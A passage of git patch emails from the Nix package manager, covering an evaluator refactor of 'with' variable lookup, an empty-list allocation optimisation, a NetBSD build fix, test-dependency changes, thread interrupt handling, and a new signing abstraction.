evalAttrs(*env->up, (Expr *) env->values[0], *v, noPos, ""); - env->values[0] = v; - env->type = Env::HasWithAttrs; - } + forceAttrs(*env->values[0], fromWith->pos, "while evaluating the first subexpression of a with expression"); Bindings::iterator j = env->values[0]->attrs->find(var.name); if (j != env->values[0]->attrs->end()) { if (countCalls) attrSelects[j->pos]++; return j->value; } - if (!env->prevWith) + if (!fromWith->parentWith) error("undefined variable '%1%'", symbols[var.name]).atPos(var.pos).withFrame(*env, var).debugThrow(); - for (size_t l = env->prevWith; l; --l, env = env->up) ; + for (size_t l = fromWith->prevWith; l; --l, env = env->up) ; + fromWith = fromWith->parentWith; } } @@ -1816,9 +1817,7 @@ void ExprWith::eval(EvalState & state, Env & env, Value & v) { Env & env2(state.allocEnv(1)); env2.up = &env; - env2.prevWith = prevWith; - env2.type = Env::HasWithExpr; - env2.values[0] = (Value *) attrs; + env2.values[0] = attrs->maybeThunk(state, env); body->eval(state, env2, v); } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index da2d256db..db606ebae 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -116,11 +116,6 @@ struct Constant struct Env { Env * up; - /** - * Number of of levels up to next `with` environment - */ - unsigned short prevWith:14; - enum { Plain = 0, HasWithExpr, HasWithAttrs } type:2; Value * values[0]; }; diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 84860b30f..ede070cff 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -333,6 +333,8 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, env)); + fromWith = nullptr; + /* Check whether the variable appears in the environment. If so, set its level and displacement. */ const StaticEnv * curEnv; @@ -344,7 +346,6 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & } else { auto i = curEnv->find(name); if (i != curEnv->vars.end()) { - fromWith = false; this->level = level; displ = i->second; return; @@ -360,7 +361,8 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & .msg = hintfmt("undefined variable '%1%'", es.symbols[name]), .errPos = es.positions[pos] }); - fromWith = true; + for (auto * e = env.get(); e && !fromWith; e = e->up) + fromWith = e->isWith; this->level = withLevel; } @@ -393,7 +395,7 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr es.exprEnvs.insert(std::make_pair(this, env)); if (recursive) { - auto newEnv = std::make_shared(false, env.get(), recursive ? attrs.size() : 0); + auto newEnv = std::make_shared(nullptr, env.get(), recursive ? attrs.size() : 0); Displacement displ = 0; for (auto & i : attrs) @@ -435,7 +437,7 @@ void ExprLambda::bindVars(EvalState & es, const std::shared_ptr es.exprEnvs.insert(std::make_pair(this, env)); auto newEnv = std::make_shared( - false, env.get(), + nullptr, env.get(), (hasFormals() ? formals->formals.size() : 0) + (!arg ? 0 : 1)); @@ -471,7 +473,7 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr & if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, env)); - auto newEnv = std::make_shared(false, env.get(), attrs->attrs.size()); + auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); Displacement displ = 0; for (auto & i : attrs->attrs) @@ -490,6 +492,10 @@ void ExprWith::bindVars(EvalState & es, const std::shared_ptr & if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, env)); + parentWith = nullptr; + for (auto * e = env.get(); e && !parentWith; e = e->up) + parentWith = e->isWith; + /* Does this `with' have an enclosing `with'? If so, record its level so that `lookupVar' can look up variables in the previous `with' if this one doesn't contain the desired attribute. */ @@ -506,7 +512,7 @@ void ExprWith::bindVars(EvalState & es, const std::shared_ptr & es.exprEnvs.insert(std::make_pair(this, env)); attrs->bindVars(es, env); - auto newEnv = std::make_shared(true, env.get()); + auto newEnv = std::make_shared(this, env.get()); body->bindVars(es, newEnv); } diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 1e57fec7a..e50a157ee 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -138,6 +138,7 @@ std::ostream & operator << (std::ostream & str, const Pos & pos); struct Env; struct Value; class EvalState; +struct ExprWith; struct StaticEnv; @@ -226,8 +227,11 @@ struct ExprVar : Expr Symbol name; /* Whether the variable comes from an environment (e.g. a rec, let - or function argument) or from a "with". */ - bool fromWith; + or function argument) or from a "with". + + `nullptr`: Not from a `with`. + Valid pointer: the nearest, innermost `with` expression to query first. */ + ExprWith * fromWith; /* In the former case, the value is obtained by going `level` levels up from the current environment and getting the @@ -385,6 +389,7 @@ struct ExprWith : Expr PosIdx pos; Expr * attrs, * body; size_t prevWith; + ExprWith * parentWith; ExprWith(const PosIdx & pos, Expr * attrs, Expr * body) : pos(pos), attrs(attrs), body(body) { }; PosIdx getPos() const override { return pos; } COMMON_METHODS @@ -478,14 +483,14 @@ extern ExprBlackHole eBlackHole; runtime. */ struct StaticEnv { - bool isWith; + ExprWith * isWith; const StaticEnv * up; // Note: these must be in sorted order. typedef std::vector> Vars; Vars vars; - StaticEnv(bool isWith, const StaticEnv * up, size_t expectedSize = 0) : isWith(isWith), up(up) { + StaticEnv(ExprWith * isWith, const StaticEnv * up, size_t expectedSize = 0) : isWith(isWith), up(up) { vars.reserve(expectedSize); }; diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index a1502da45..924de3184 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -214,7 +214,7 @@ static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * v Env * env = &state.allocEnv(vScope->attrs->size()); env->up = &state.baseEnv; - auto staticEnv = std::make_shared(false, state.staticBaseEnv.get(), vScope->attrs->size()); + auto staticEnv = std::make_shared(nullptr, state.staticBaseEnv.get(), vScope->attrs->size()); unsigned int displ = 0; for (auto & attr : *vScope->attrs) { From 3f796514b37a1e723a395fce8271428410e93f5f Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 2 Jan 2024 12:39:16 +0100 Subject: [PATCH 186/654] Optimize empty list constants MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This avoids a Value allocation for empty list constants. During a `nix search nixpkgs`, about 82% of all thunked lists are empty, so this removes about 3 million Value allocations. Performance comparison on `nix search github:NixOS/nixpkgs/e1fa12d4f6c6fe19ccb59cac54b5b3f25e160870 --no-eval-cache`: maximum RSS: median = 3845432.0000 mean = 3845432.0000 stddev = 0.0000 min = 3845432.0000 max = 3845432.0000 [rejected?, p=0.00000, Δ=-70084.00000±0.00000] soft page faults: median = 965395.0000 mean = 965394.6667 stddev = 1.1181 min = 965392.0000 max = 965396.0000 [rejected?, p=0.00000, Δ=-17929.77778±38.59610] system CPU time: median = 1.8029 mean = 1.7702 stddev = 0.0621 min = 1.6749 max = 1.8417 [rejected, p=0.00064, Δ=-0.12873±0.09905] user CPU time: median = 14.1022 mean = 14.0633 stddev = 0.1869 min = 13.8118 max = 14.3190 [not rejected, p=0.03006, Δ=-0.18248±0.24928] elapsed time: median = 15.8205 mean = 15.8618 stddev = 0.2312 min = 15.5033 max = 16.1670 [not rejected, p=0.00558, Δ=-0.28963±0.29434] --- src/libexpr/eval.cc | 11 +++++++++++ src/libexpr/eval.hh | 3 +++ src/libexpr/nixexpr.hh | 1 + 3 files changed, 15 insertions(+) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 810843995..494b8338f 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -554,6 +554,8 @@ EvalState::EvalState( static_assert(sizeof(Env) <= 16, "environment must be <= 16 bytes"); + vEmptyList.mkList(0); + /* Initialise the Nix expression search path. */ if (!evalSettings.pureEval) { for (auto & i : _searchPath.elements) @@ -1384,6 +1386,15 @@ void ExprList::eval(EvalState & state, Env & env, Value & v) } +Value * ExprList::maybeThunk(EvalState & state, Env & env) +{ + if (elems.empty()) { + return &state.vEmptyList; + } + return Expr::maybeThunk(state, env); +} + + void ExprVar::eval(EvalState & state, Env & env, Value & v) { Value * v2 = state.lookupVar(&env, *this, false); diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index da2d256db..bf85b50c8 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -305,6 +305,9 @@ public: return *errorBuilder; } + /* Empty list constant. */ + Value vEmptyList; + private: /* Cache for calls to addToStore(); maps source paths to the store diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 1e57fec7a..55e930758 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -299,6 +299,7 @@ struct ExprList : Expr std::vector elems; ExprList() { }; COMMON_METHODS + Value * maybeThunk(EvalState & state, Env & env) override; PosIdx getPos() const override { From 2b20f36f9515882589975d14a94ba1fd2b5c513a Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 2 Jan 2024 12:33:51 -0500 Subject: [PATCH 187/654] Fix NetBSD build There was still a mistake after my earlier a7115a47ef0d83ea81b494f6bc5b11d8286e0672 and e13fc0bbdb1e1eefeb33ff4d18310958041b1ad5. This finally gets it right. --- configure.ac | 7 ++++++- src/libstore/globals.hh | 2 ++ src/libstore/posix-fs-canonicalise.cc | 4 ++-- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/configure.ac b/configure.ac index 1bc4f17b0..b97e25bbd 100644 --- a/configure.ac +++ b/configure.ac @@ -308,7 +308,12 @@ AC_SUBST(HAVE_SECCOMP, [$have_seccomp]) # Optional dependencies for better normalizing file system data AC_CHECK_HEADERS([sys/xattr.h]) -AC_CHECK_FUNCS([llistxattr lremovexattr]) +AS_IF([test "$ac_cv_header_sys_xattr_h" = "yes"],[ + AC_CHECK_FUNCS([llistxattr lremovexattr]) + AS_IF([test "$ac_cv_func_llistxattr" = "yes" && test "$ac_cv_func_lremovexattr" = "yes"],[ + AC_DEFINE([HAVE_ACL_SUPPORT], [1], [Define if we can manipulate file system Access Control Lists]) + ]) +]) # Look for aws-cpp-sdk-s3. AC_LANG_PUSH(C++) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index b35dc37a1..cf34ae354 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -946,7 +946,9 @@ public: may be useful in certain scenarios (e.g. to spin up containers or set up userspace network interfaces in tests). )"}; +#endif +#if HAVE_ACL_SUPPORT Setting ignoredAcls{ this, {"security.selinux", "system.nfs4_acl", "security.csm"}, "ignored-acls", R"( diff --git a/src/libstore/posix-fs-canonicalise.cc b/src/libstore/posix-fs-canonicalise.cc index 5edda0157..8b29e90d4 100644 --- a/src/libstore/posix-fs-canonicalise.cc +++ b/src/libstore/posix-fs-canonicalise.cc @@ -1,4 +1,4 @@ -#if HAVE_SYS_XATTR_H +#if HAVE_ACL_SUPPORT # include #endif @@ -78,7 +78,7 @@ static void canonicalisePathMetaData_( if (!(S_ISREG(st.st_mode) || S_ISDIR(st.st_mode) || S_ISLNK(st.st_mode))) throw Error("file '%1%' has an unsupported type", path); -#if HAVE_SYS_XATTR_H && HAVE_LLISTXATTR && HAVE_LREMOVEXATTR +#if HAVE_ACL_SUPPORT /* Remove extended attributes / ACLs. */ ssize_t eaSize = llistxattr(path.c_str(), nullptr, 0); From 86e924443722a04f7d458594e3332ffaa73edb1d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 2 Jan 2024 12:41:53 -0500 Subject: [PATCH 188/654] Fix `buildNoTest` `checkInputs` is not right for this because we don't just need these deps when `doTest`, we also need them when `installUnitTests`. --- package.nix | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/package.nix b/package.nix index b5ff45083..56276ecc4 100644 --- a/package.nix +++ b/package.nix @@ -214,6 +214,9 @@ in { ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ editline lowdown + ] ++ lib.optionals buildUnitTests [ + gtest + rapidcheck ] ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid # There have been issues building these dependencies @@ -232,11 +235,6 @@ in { dontBuild = !attrs.doBuild; doCheck = attrs.doCheck; - checkInputs = [ - gtest - rapidcheck - ]; - nativeCheckInputs = [ git mercurial From 7b8af5f916a73aa5927b103ff712280023cea840 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 2 Jan 2024 12:50:48 -0500 Subject: [PATCH 189/654] `buildNoTests`: Restore intent The thing we wanted to test was that building Nix without building or running tests, and without depending on libraries only needed by tests, works. But since 6c8f4ef3502aa214557541ec00538e41aeced6e3, we can also install unit tests, and during the conversion to using `package.nix` this started happening more often (they go to a separate output though, so this should be fine). This adds more `... = false` to restore the original intent: don't run unit test or functional tests, and don't install unit tests. --- flake.nix | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/flake.nix b/flake.nix index a8fc105e8..9217de9af 100644 --- a/flake.nix +++ b/flake.nix @@ -234,11 +234,11 @@ buildNoGc = forAllSystems (system: self.packages.${system}.nix.overrideAttrs (a: { configureFlags = (a.configureFlags or []) ++ ["--enable-gc=no"];})); buildNoTests = forAllSystems (system: - self.packages.${system}.nix.overrideAttrs (a: { - doCheck = - assert ! a?dontCheck; - false; - }) + self.packages.${system}.nix.override { + doCheck = false; + doInstallCheck = false; + installUnitTests = false; + } ); # Perl bindings for various platforms. From 484881f3021856cd0d0c0cb42d4473b3c7ea0051 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 3 Jan 2024 10:23:27 +0100 Subject: [PATCH 190/654] Move empty list constant --- src/libexpr/eval.hh | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index bf85b50c8..e2180f00d 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -218,6 +218,11 @@ public: Bindings emptyBindings; + /** + * Empty list constant. + */ + Value vEmptyList; + /** * The accessor for the root filesystem. */ @@ -305,9 +310,6 @@ public: return *errorBuilder; } - /* Empty list constant. */ - Value vEmptyList; - private: /* Cache for calls to addToStore(); maps source paths to the store From 24e70489e59f9ab75310382dc59df09796ea8df4 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 3 Jan 2024 19:14:50 +0100 Subject: [PATCH 191/654] withFramedSink(): Receive interrupts on the stderr thread Otherwise Nix deadlocks when Ctrl-C is received in withFramedSink(): the parent thread will wait forever for the stderr thread to shut down. Fixes the hang reported in https://github.com/NixOS/nix/issues/7245#issuecomment-1770560923. --- src/libstore/remote-store.cc | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index f0df646ca..078b9fe00 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -16,6 +16,8 @@ #include "logging.hh" #include "callback.hh" #include "filetransfer.hh" +#include "signals.hh" + #include namespace nix { @@ -1066,6 +1068,7 @@ void RemoteStore::ConnectionHandle::withFramedSink(std::function Date: Wed, 3 Jan 2024 19:30:02 +0100 Subject: [PATCH 192/654] Make some more threads receive interrupts Shouldn't hurt to do this. In particular, this should speed up shutting down the PathSubstitutionGoal thread if it's copying from a remote store. --- src/libstore/build/substitution-goal.cc | 3 +++ src/libutil/thread-pool.cc | 2 ++ 2 files changed, 5 insertions(+) diff --git a/src/libstore/build/substitution-goal.cc b/src/libstore/build/substitution-goal.cc index 93867007d..c7e8e2825 100644 --- a/src/libstore/build/substitution-goal.cc +++ b/src/libstore/build/substitution-goal.cc @@ -2,6 +2,7 @@ #include "substitution-goal.hh" #include "nar-info.hh" #include "finally.hh" +#include "signals.hh" namespace nix { @@ -217,6 +218,8 @@ void PathSubstitutionGoal::tryToRun() thr = std::thread([this]() { try { + ReceiveInterrupts receiveInterrupts; + /* Wake up the worker loop when we're done. */ Finally updateStats([this]() { outPipe.writeSide.close(); }); diff --git a/src/libutil/thread-pool.cc b/src/libutil/thread-pool.cc index c5e735617..9a7dfee56 100644 --- a/src/libutil/thread-pool.cc +++ b/src/libutil/thread-pool.cc @@ -79,6 +79,8 @@ void ThreadPool::process() void ThreadPool::doWork(bool mainThread) { + ReceiveInterrupts receiveInterrupts; + if (!mainThread) interruptCheck = [&]() { return (bool) quit; }; From 12bb8cdd381156456a712e4a5a8af3b6bc852eab Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 3 Jan 2024 15:02:20 -0500 Subject: [PATCH 193/654] Signer infrastructure: Prep for #9076 This sets up infrastructure in libutil to allow for signing other than by a secret key in memory. #9076 uses this to implement remote signing. (Split from that PR to allow reviewing in smaller chunks.) Co-Authored-By: Raito Bezarius --- perl/lib/Nix/Store.xs | 1 - src/libstore/binary-cache-store.cc | 5 +- src/libstore/binary-cache-store.hh | 5 +- src/libstore/globals.cc | 5 -- src/libstore/keys.cc | 31 ++++++++++ src/libstore/keys.hh | 10 +++ src/libstore/local-store.cc | 7 ++- src/libstore/local.mk | 2 +- src/libstore/path-info.cc | 4 +- src/libstore/path-info.hh | 4 +- src/libstore/path.cc | 6 +- src/libstore/realisation.cc | 5 +- src/libstore/realisation.hh | 4 +- src/libstore/store-api.cc | 2 +- src/libutil/hash.cc | 9 +++ src/libutil/hash.hh | 6 +- src/libutil/local.mk | 7 ++- .../signature/local-keys.cc} | 54 +++++++--------- .../signature/local-keys.hh} | 42 +++++++++++-- src/libutil/signature/signer.cc | 23 +++++++ src/libutil/signature/signer.hh | 61 +++++++++++++++++++ src/libutil/util.cc | 4 ++ src/nix/sigs.cc | 5 +- src/nix/verify.cc | 1 + 24 files changed, 233 insertions(+), 70 deletions(-) create mode 100644 src/libstore/keys.cc create mode 100644 src/libstore/keys.hh rename src/{libstore/crypto.cc => libutil/signature/local-keys.cc} (64%) rename src/{libstore/crypto.hh => libutil/signature/local-keys.hh} (51%) create mode 100644 src/libutil/signature/signer.cc create mode 100644 src/libutil/signature/signer.hh diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 4964b8a34..423c01cf7 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -12,7 +12,6 @@ #include "realisation.hh" #include "globals.hh" #include "store-api.hh" -#include "crypto.hh" #include "posix-source-accessor.hh" #include diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc index 8a3052433..ea1279e2e 100644 --- a/src/libstore/binary-cache-store.cc +++ b/src/libstore/binary-cache-store.cc @@ -28,7 +28,8 @@ BinaryCacheStore::BinaryCacheStore(const Params & params) , Store(params) { if (secretKeyFile != "") - secretKey = std::unique_ptr(new SecretKey(readFile(secretKeyFile))); + signer = std::make_unique( + SecretKey { readFile(secretKeyFile) }); StringSink sink; sink << narVersionMagic1; @@ -274,7 +275,7 @@ ref BinaryCacheStore::addToStoreCommon( stats.narWriteCompressionTimeMs += duration; /* Atomically write the NAR info file.*/ - if (secretKey) narInfo->sign(*this, *secretKey); + if (signer) narInfo->sign(*this, *signer); writeNarInfo(narInfo); diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh index 98e43ee6a..00ab73905 100644 --- a/src/libstore/binary-cache-store.hh +++ b/src/libstore/binary-cache-store.hh @@ -1,7 +1,7 @@ #pragma once ///@file -#include "crypto.hh" +#include "signature/local-keys.hh" #include "store-api.hh" #include "log-store.hh" @@ -57,8 +57,7 @@ class BinaryCacheStore : public virtual BinaryCacheStoreConfig, { private: - - std::unique_ptr secretKey; + std::unique_ptr signer; protected: diff --git a/src/libstore/globals.cc b/src/libstore/globals.cc index f401d076d..50584e06c 100644 --- a/src/libstore/globals.cc +++ b/src/libstore/globals.cc @@ -15,8 +15,6 @@ #include -#include - #ifdef __GLIBC__ # include # include @@ -409,9 +407,6 @@ void initLibStore() { initLibUtil(); - if (sodium_init() == -1) - throw Error("could not initialise libsodium"); - loadConfFile(); preloadNSS(); diff --git a/src/libstore/keys.cc b/src/libstore/keys.cc new file mode 100644 index 000000000..2cc50970f --- /dev/null +++ b/src/libstore/keys.cc @@ -0,0 +1,31 @@ +#include "file-system.hh" +#include "globals.hh" +#include "keys.hh" + +namespace nix { + +PublicKeys getDefaultPublicKeys() +{ + PublicKeys publicKeys; + + // FIXME: filter duplicates + + for (auto s : settings.trustedPublicKeys.get()) { + PublicKey key(s); + publicKeys.emplace(key.name, key); + } + + for (auto secretKeyFile : settings.secretKeyFiles.get()) { + try { + SecretKey secretKey(readFile(secretKeyFile)); + publicKeys.emplace(secretKey.name, secretKey.toPublicKey()); + } catch (SysError & e) { + /* Ignore unreadable key files. That's normal in a + multi-user installation. */ + } + } + + return publicKeys; +} + +} diff --git a/src/libstore/keys.hh b/src/libstore/keys.hh new file mode 100644 index 000000000..3da19493f --- /dev/null +++ b/src/libstore/keys.hh @@ -0,0 +1,10 @@ +#pragma once +///@file + +#include "signature/local-keys.hh" + +namespace nix { + +PublicKeys getDefaultPublicKeys(); + +} diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 63e90ea1e..0f3c37c8a 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -14,6 +14,7 @@ #include "signals.hh" #include "posix-fs-canonicalise.hh" #include "posix-source-accessor.hh" +#include "keys.hh" #include #include @@ -1578,7 +1579,8 @@ void LocalStore::signRealisation(Realisation & realisation) for (auto & secretKeyFile : secretKeyFiles.get()) { SecretKey secretKey(readFile(secretKeyFile)); - realisation.sign(secretKey); + LocalSigner signer(std::move(secretKey)); + realisation.sign(signer); } } @@ -1590,7 +1592,8 @@ void LocalStore::signPathInfo(ValidPathInfo & info) for (auto & secretKeyFile : secretKeyFiles.get()) { SecretKey secretKey(readFile(secretKeyFile)); - info.sign(*this, secretKey); + LocalSigner signer(std::move(secretKey)); + info.sign(*this, signer); } } diff --git a/src/libstore/local.mk b/src/libstore/local.mk index 68ccdc409..675976314 100644 --- a/src/libstore/local.mk +++ b/src/libstore/local.mk @@ -8,7 +8,7 @@ libstore_SOURCES := $(wildcard $(d)/*.cc $(d)/builtins/*.cc $(d)/build/*.cc) libstore_LIBS = libutil -libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) $(SODIUM_LIBS) -pthread +libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) -pthread ifdef HOST_LINUX libstore_LDFLAGS += -ldl endif diff --git a/src/libstore/path-info.cc b/src/libstore/path-info.cc index f58e31bfd..d82ccd0c9 100644 --- a/src/libstore/path-info.cc +++ b/src/libstore/path-info.cc @@ -38,9 +38,9 @@ std::string ValidPathInfo::fingerprint(const Store & store) const } -void ValidPathInfo::sign(const Store & store, const SecretKey & secretKey) +void ValidPathInfo::sign(const Store & store, const Signer & signer) { - sigs.insert(secretKey.signDetached(fingerprint(store))); + sigs.insert(signer.signDetached(fingerprint(store))); } std::optional ValidPathInfo::contentAddressWithReferences() const diff --git a/src/libstore/path-info.hh b/src/libstore/path-info.hh index 077abc7e1..b6dc0855d 100644 --- a/src/libstore/path-info.hh +++ b/src/libstore/path-info.hh @@ -1,7 +1,7 @@ #pragma once ///@file -#include "crypto.hh" +#include "signature/signer.hh" #include "path.hh" #include "hash.hh" #include "content-address.hh" @@ -107,7 +107,7 @@ struct ValidPathInfo : UnkeyedValidPathInfo { */ std::string fingerprint(const Store & store) const; - void sign(const Store & store, const SecretKey & secretKey); + void sign(const Store & store, const Signer & signer); /** * @return The `ContentAddressWithReferences` that determines the diff --git a/src/libstore/path.cc b/src/libstore/path.cc index 1afd10af7..a15a78545 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -1,7 +1,5 @@ #include "store-dir-config.hh" -#include - namespace nix { static void checkName(std::string_view path, std::string_view name) @@ -49,9 +47,7 @@ StorePath StorePath::dummy("ffffffffffffffffffffffffffffffff-x"); StorePath StorePath::random(std::string_view name) { - Hash hash(HashAlgorithm::SHA1); - randombytes_buf(hash.hash, hash.hashSize); - return StorePath(hash, name); + return StorePath(Hash::random(HashAlgorithm::SHA1), name); } StorePath StoreDirConfig::parseStorePath(std::string_view path) const diff --git a/src/libstore/realisation.cc b/src/libstore/realisation.cc index 93ddb5b20..86bfdd1a8 100644 --- a/src/libstore/realisation.cc +++ b/src/libstore/realisation.cc @@ -1,6 +1,7 @@ #include "realisation.hh" #include "store-api.hh" #include "closure.hh" +#include "signature/local-keys.hh" #include namespace nix { @@ -113,9 +114,9 @@ std::string Realisation::fingerprint() const return serialized.dump(); } -void Realisation::sign(const SecretKey & secretKey) +void Realisation::sign(const Signer &signer) { - signatures.insert(secretKey.signDetached(fingerprint())); + signatures.insert(signer.signDetached(fingerprint())); } bool Realisation::checkSignature(const PublicKeys & publicKeys, const std::string & sig) const diff --git a/src/libstore/realisation.hh b/src/libstore/realisation.hh index 4ba2123d8..ddb4af770 100644 --- a/src/libstore/realisation.hh +++ b/src/libstore/realisation.hh @@ -8,7 +8,7 @@ #include "derived-path.hh" #include #include "comparator.hh" -#include "crypto.hh" +#include "signature/signer.hh" namespace nix { @@ -64,7 +64,7 @@ struct Realisation { static Realisation fromJSON(const nlohmann::json& json, const std::string& whence); std::string fingerprint() const; - void sign(const SecretKey &); + void sign(const Signer &); bool checkSignature(const PublicKeys & publicKeys, const std::string & sig) const; size_t checkSignatures(const PublicKeys & publicKeys) const; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index c2516afb5..c48bfc248 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -1,4 +1,4 @@ -#include "crypto.hh" +#include "signature/local-keys.hh" #include "source-accessor.hh" #include "globals.hh" #include "derived-path.hh" diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 502afbda2..d067da969 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -14,6 +14,8 @@ #include #include +#include + namespace nix { static size_t regularHashSize(HashAlgorithm type) { @@ -261,6 +263,13 @@ Hash::Hash(std::string_view rest, HashAlgorithm algo, bool isSRI) throw BadHash("hash '%s' has wrong length for hash algorithm '%s'", rest, printHashAlgo(this->algo)); } +Hash Hash::random(HashAlgorithm algo) +{ + Hash hash(algo); + randombytes_buf(hash.hash, hash.hashSize); + return hash; +} + Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha) { if (hashStr.empty()) { diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 2fe9a53f5..f7e8eb265 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -5,7 +5,6 @@ #include "serialise.hh" #include "file-system.hh" - namespace nix { @@ -143,6 +142,11 @@ public: } static Hash dummy; + + /** + * @return a random hash with hash algorithm `algo` + */ + static Hash random(HashAlgorithm algo); }; /** diff --git a/src/libutil/local.mk b/src/libutil/local.mk index 81efaafec..0fdebaf5c 100644 --- a/src/libutil/local.mk +++ b/src/libutil/local.mk @@ -4,14 +4,17 @@ libutil_NAME = libnixutil libutil_DIR := $(d) -libutil_SOURCES := $(wildcard $(d)/*.cc) +libutil_SOURCES := $(wildcard $(d)/*.cc $(d)/signature/*.cc) libutil_CXXFLAGS += -I src/libutil -libutil_LDFLAGS += -pthread $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context +libutil_LDFLAGS += -pthread $(LIBCURL_LIBS) $(SODIUM_LIBS) $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context $(foreach i, $(wildcard $(d)/args/*.hh), \ $(eval $(call install-file-in, $(i), $(includedir)/nix/args, 0644))) +$(foreach i, $(wildcard $(d)/signature/*.hh), \ + $(eval $(call install-file-in, $(i), $(includedir)/nix/signature, 0644))) + ifeq ($(HAVE_LIBCPUID), 1) libutil_LDFLAGS += -lcpuid diff --git a/src/libstore/crypto.cc b/src/libutil/signature/local-keys.cc similarity index 64% rename from src/libstore/crypto.cc rename to src/libutil/signature/local-keys.cc index 1b705733c..858b036f5 100644 --- a/src/libstore/crypto.cc +++ b/src/libutil/signature/local-keys.cc @@ -1,13 +1,12 @@ -#include "crypto.hh" +#include "signature/local-keys.hh" + #include "file-system.hh" #include "util.hh" -#include "globals.hh" - #include namespace nix { -static std::pair split(std::string_view s) +BorrowedCryptoValue BorrowedCryptoValue::parse(std::string_view s) { size_t colon = s.find(':'); if (colon == std::string::npos || colon == 0) @@ -17,10 +16,10 @@ static std::pair split(std::string_view s) Key::Key(std::string_view s) { - auto ss = split(s); + auto ss = BorrowedCryptoValue::parse(s); - name = ss.first; - key = ss.second; + name = ss.name; + key = ss.payload; if (name == "" || key == "") throw Error("secret key is corrupt"); @@ -73,45 +72,34 @@ PublicKey::PublicKey(std::string_view s) throw Error("public key is not valid"); } -bool verifyDetached(const std::string & data, const std::string & sig, - const PublicKeys & publicKeys) +bool PublicKey::verifyDetached(std::string_view data, std::string_view sig) const { - auto ss = split(sig); + auto ss = BorrowedCryptoValue::parse(sig); - auto key = publicKeys.find(std::string(ss.first)); - if (key == publicKeys.end()) return false; + if (ss.name != std::string_view { name }) return false; - auto sig2 = base64Decode(ss.second); + return verifyDetachedAnon(data, ss.payload); +} + +bool PublicKey::verifyDetachedAnon(std::string_view data, std::string_view sig) const +{ + auto sig2 = base64Decode(sig); if (sig2.size() != crypto_sign_BYTES) throw Error("signature is not valid"); return crypto_sign_verify_detached((unsigned char *) sig2.data(), (unsigned char *) data.data(), data.size(), - (unsigned char *) key->second.key.data()) == 0; + (unsigned char *) key.data()) == 0; } -PublicKeys getDefaultPublicKeys() +bool verifyDetached(std::string_view data, std::string_view sig, const PublicKeys & publicKeys) { - PublicKeys publicKeys; + auto ss = 